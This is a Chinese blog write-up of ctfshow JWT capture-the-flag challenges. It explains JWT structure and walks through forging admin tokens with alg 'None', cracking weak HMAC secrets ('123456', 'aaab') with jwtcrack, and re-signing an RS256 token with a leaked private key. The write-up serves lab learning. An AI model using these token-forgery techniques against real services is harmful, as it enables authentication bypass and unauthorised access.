ctfshow web入门 jwt

最新推荐文章于 2024-07-03 18:08:32 发布
最新推荐文章于 2024-07-03 18:08:32 发布
阅读量2.4k 收藏 4
点赞数 1
分类专栏: CTFshow WP CTF 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/121862568
版权
CTF 同时被 3 个专栏收录
23 篇文章 1 订阅
订阅专栏
WP
20 篇文章 1 订阅
订阅专栏
CTFshow
9 篇文章 1 订阅
订阅专栏
博客内容探讨了JWT(JSON Web Token)的构成,包括头部、载荷和签证,以及其在安全性上的漏洞。文中通过实例展示了如何篡改JWT中的`sub`字段以获取权限,同时提到了使用在线工具解密JWT和JWTcrack进行密码破解。最后,文章讨论了使用公私钥对JWT进行RS256加密的情况,并展示了如何利用私钥修改JWT来获取flag。
摘要由CSDN通过智能技术生成

基础知识

jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature)

头部

头部声明了类型和加密方法,如下

{
  'typ': 'JWT',
  'alg': 'HS256'
}

然后将头部进行base64加密后去掉=号,构成第一部分

ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9

载荷

和头部结构类似,但存放的是数据

签证

jwt的第三部分是一个签证信息,这个签证信息由三部分组成:

header (base64后的)
payload (base64后的)
secret
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后

payload示例

{
  "sub": "1234567890",
  "name": "John Doe"
}
标准中注册的声明 (建议但不强制使用) 
# iss: jwt签发者
# sub: jwt所面向的用户
# aud: 接收jwt的一方
# exp: jwt的过期时间,这个过期时间必须要大于签发时间
# nbf: 定义在什么时间之前,该jwt都是不可用的
# iat: jwt的签发时间
# jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击

web345

F12发现/admin,访问后抓包发现cookie后跟着jwt的值
image-20211209120828093

auth=eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE2MzI2MjI1ODksImV4cCI6MTYzMjYyOTc4OSwibmJmIjoxNjMyNjIyNTg5LCJzdWIiOiJ1c2VyIiwianRpIjoiZDNlYjRlZTgyMThjMmNmZTVlMGQxMjM5MjNlNDc0M2EifV0

base64解码后得到

{"alg":"None","typ":"jwt"}[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"user","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]

将sub的值改为admin后,在进行base64加密

{"alg":"None","typ":"jwt"}[{"iss":"admin","iat":1632622589,"exp":1632629789,"nbf":1632622589,"sub":"admin","jti":"d3eb4ee8218c2cfe5e0d123923e4743a"}]

传给auth后得到flag
image-20211209121211889

web346

在/admin抓包后得到jwt值

eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYzOTAyNDY4NCwiZXhwIjoxNjM5MDMxODg0LCJuYmYiOjE2MzkwMjQ2ODQsInN1YiI6ImFkbWluIiwianRpIjoiMzU4ZmVhZmI5YjdjZjViZWExYjlmODQyYjVkMWJhNmIifQo=

使用在线工具解密后得到
jwt在线工具
image-20211209130353171
猜测密码是123456修改sub的值(不知道为什么明明密码很简单但是jwtcrack却跑不出来)
image-20211209124629049
传参得到flag
image-20211209122725059

web347

同上密码还是123456

web348

/admin目录抓包得到jwt值

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYzOTAyNjQ4NiwiZXhwIjoxNjM5MDMzNjg2LCJuYmYiOjE2MzkwMjY0ODYsInN1YiI6InVzZXIiLCJqdGkiOiJhYjkzNjNkZGM2MDhjODk3NTI0MTMyYTM4NjE3OTk4MCJ9.fkXIROeG08zyykg9u0PnqkJ4VvYv39f3zwkLjXce8FA

用jwtcrack爆破密码,得到密码aaab
image-20211209131111049
修改密码和sub值
image-20211209131137290
传参得到flag
image-20211209131150348

web349

打开源码访问发现public.key和private.key,访问后得到公私钥

router.get('/', function(req, res, next) {
  res.type('html');
  var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');
  var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });
  res.cookie('auth',token);
  res.end('where is flag?');
  
});

router.post('/',function(req,res,next){
	var flag="flag_here";
	res.type('html');
	var auth = req.cookies.auth;
	var cert = fs.readFileSync(process.cwd()+'//public/public.key');  // get public key
	jwt.verify(auth, cert, function(err, decoded) {
	  if(decoded.user==='admin'){
	  	res.end(flag);
	  }else{
	  	res.end('you are not admin');
	  }
	});
});

抓包得到jwt的值,jwt.io解码后得到RS256加密

{
  "alg": "RS256",
  "typ": "JWT"
}
{
  "user": "user",
  "iat": 1609250966
}

将payload中的user改为admin,把私钥和公钥复制进Verify Signature即可得到我们需要的auth的值。传参即可得到flag

S1nJa
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugkuctf jwt
舞动的獾
11-13 1712
bugku jwt 查看页面源码,发现了注释,<!–hint:NNVTU23LGEZDG===–> 很像是base64,但是不是,解密结果为未知字符。又去注了半天,没有跑出密码,后来看了大佬的wp才发现是base32,无语,思维定型了,开始的时候想着试试base32,自己把自己否定了,我tcl了。 注释内容base32解密后是kk:kkk123,猜测是账户和密码,登陆成功 信息上要...
web api JWT token认证
04-24
Web API JWT Token认证是现代Web应用中一种常见的安全机制,用于保护API接口免受未经授权的访问。JWT(JSON Web Tokens)是一种轻量级的身份验证和授权机制,它允许客户端通过在请求头中发送一个令牌来证明其身份。...
CTFSHOW】web入门 JWT
7ruth0hn的博客
09-27 1077
文章目录写在前面JWT浅析web345web346web347web348web349web350参考资料 写在前面 陇剑杯初赛出了JWT专题的赛题,被同队大佬ak了,一直不太懂,来刷刷 JWT浅析 JWT即JSON WEB TOKEN,由三个部分组成,并用两个“.”进行连接。第一部分为header(base64加密),第二部分为payload(base64加密),第三部分为verify signature,它的构成如下: HEADER中alg对应的加密方式为HS256,也可以选择其他对称或非对称的加密方
揭秘JWT:从CTF实战到Web开发,py使用JWT令牌验证
最新发布
xt350488的博客
07-03 1121
JWT(JSON Web Tokens)是一种开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在网络上安全地传输信息。这种信息可以验证和信任,因为它是数字签名的。JWT可以使用HMAC算法或者是RSA的公私秘钥对进行签名。:服务器不需要保存会话信息,减轻了服务器负担。:易于在分布式系统中使用,支持跨域身份验证。:通过数字签名确保信息的完整性和来源可信。:由于包含头部、负载和签名,JWT的大小可能相对较大。:每次请求都需要验证JWT,可能会增加服务器的处理时间。
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1278
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
ctfshow web入门 jwt(持续更新)
Lum1n0us's Blog
08-02 1436
文章目录基础知识web345web346-347web348 基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数
ctfshow web入门 JWT
Anton1a的博客
02-24 4304
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
.Net WebAPi JWT身份验证
11-07
**.NET WebAPI JWT身份验证详解** 在现代Web应用程序中,安全性和权限管理是至关重要的。JSON Web Token(JWT)是一种轻量级的身份验证和授权机制,被广泛应用于API访问控制。本文将深入探讨如何在.NET Framework ...
WebApiDemo(net6+swagger+jwt)
05-31
WebApiDemo是一个基于.NET 6框架的Web API项目,它集成了Swagger用于接口文档的展示与测试,同时引入了JWT(JSON Web Token)进行身份验证和授权管理。这个项目是用Visual Studio 2022开发环境构建的,旨在提供一个...
.NET6平台开发WebApi-使用JWT进行用户鉴权和测试源码
02-21
在.NET6平台上开发WebAPI应用时,为了实现安全的用户身份验证和授权,通常会采用JSON Web Tokens(JWT)机制。JWT是一种轻量级的身份验证标准,它允许服务端为客户端颁发一个令牌,该令牌包含了用户的相关信息,且在...
Webapi_JWT_Authentication-master_webapi_jwt_token_
10-03
WebAPI与JWT(JSON Web Tokens)身份验证是一种常见的安全机制,用于保护WebAPI接口免受未经授权的访问。JWT令牌提供了一种轻量级的方式来进行身份验证和授权,它允许服务器在客户端之间安全地传递信息,而无需存储...
ctfshow jwt web入门
2301_81040377的博客
06-03 516
jwt令牌由三部分组成,由分割header示例payload示例。
CTF-Web jwt
Makabakahaha的博客
10-04 258
web做题记录
ctfshow——JWT
qq_55202378的博客
05-01 991
抓个包,可以看到cookie部分使用JWT(Json Web Token)。 先用base64将JWT进行解密,修改为admin,再用base64进行加密。再访问 这里使用了HS256加密方式,方法:alg字段改为,sub改为,对每一段分别用base64进行加密,然后用拼接起来,注意最后一个点不能少。都可以用jwt-cracker进行爆破,获取密匙。或者用脚本跑。 web 349——非对称加密算法RS256私钥泄漏 根据提示,大致意思就是访问,服务器会使用RS256算法私钥加密一段字符串作为cookie
CTFSHOW jwt
羽的博客
12-30 5756
可以先了解下jwt jwt由三部分组成header、payload、signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } payload示例 { "sub": "1234567890", "name": "John Doe" } signature jwt的第三部分是一个签证信息,这个签证信息由三部分组成: header (base64编码) payload (base64编码) secret(密钥) 这个部分需要base64加密后的he
CTFshow刷题日记-WEB-JWT(web345-350)
Love&Share
09-22 2092
JWT JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔 Header Payload Signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } # typ:声明类型 # alg:声明加密的算法 通常直接使用 HMAC SHA256 需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的 payload示例 { "sub": "1234567890", "nam
ctf_show笔记篇(web入门---jwt
whale_waves的博客
04-02 1370
JSON Web Token(JWT)通常由三部分组成简单地说jwt就是一串字符串,类似于序列化这种,把用户的信息保存在字符串里JWT全称是,如果从字面上理解感觉是基于JSON格式用于网络传输的令牌。实际上,JWT是一种紧凑的Claims声明格式,旨在用于空间受限的环境进行传输,常见的场景如HTTP授权请求头参数和URI查询参数。JWT会把Claims转换成JSON格式,而这个JSON内容将会应用为JWS结构的有效载荷或者应用为JWE结构的(加密处理后的)原始字符串,通过消息认证码(或者简称MAC。
CTFHub-Web进阶-JWT练习
Atkx's Blog
07-25 2946
什么是JWTJWT的结构CTFHub-Web-JWT练习敏感信息泄露 什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC7519)。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。 JWT的结构 .
Json web token (JWT)渗透与防御及ctf例题
weixin_65582330的博客
03-06 1123
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 在CTFShow中,可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。例如,可以将头部的算法字段改为"none",将有效载荷中的用户字段改为"admin",以绕过网站的JWT算法限制。 为了生成这样的JWT,可以使用Python脚本来生成。脚本中使用了jwt库,通过指定合适的头部、有效载荷和算法来生成JWT。具体来说,可以将头部的算法字段设置为"none",将有效载荷中的用户字段设置为"admin"。生成的JWT可以用于攻击或验证绕过。 总结来说,CTFShow JWT是一个由头部、有效载荷和签名组成的JSON Web Token,在CTFShow中可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值